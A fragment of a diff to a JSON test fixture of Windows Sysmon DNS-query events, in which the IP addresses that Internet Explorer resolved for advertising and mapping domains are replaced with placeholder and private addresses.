SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -6290,7 +6290,7 @@ "ProcessId": "2736", "QueryName": "cdn3.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;", + "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.357" }, @@ -6325,7 +6325,7 @@ "ProcessId": "2736", "QueryName": "rtb0.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.721", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -6348,7 +6348,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -6359,7 +6359,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6378,7 +6378,7 @@ "event_data": { "QueryName": "dev.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;", + "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.774", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6401,7 +6401,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -6427,7 +6427,7 @@ "ProcessId": "2736", "QueryName": "t.ssl.ak.dynamic.tiles.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;" + "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "pid": 2828, @@ -6440,7 +6440,7 @@ { "@timestamp": "2021-05-05T15:30:51.709Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6456,7 +6456,7 @@ "event_data": { "QueryName": "rp.gwallet.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.943", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6483,7 +6483,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6491,7 +6491,7 @@ "event_data": { "QueryName": "ads.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;", + "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.945", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6525,7 +6525,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6541,7 +6541,7 @@ "ProcessId": "2736", "QueryName": "um.simpli.fi", "QueryStatus": "0", - "QueryResults": "::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -6588,7 +6588,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.955", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6609,7 +6609,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 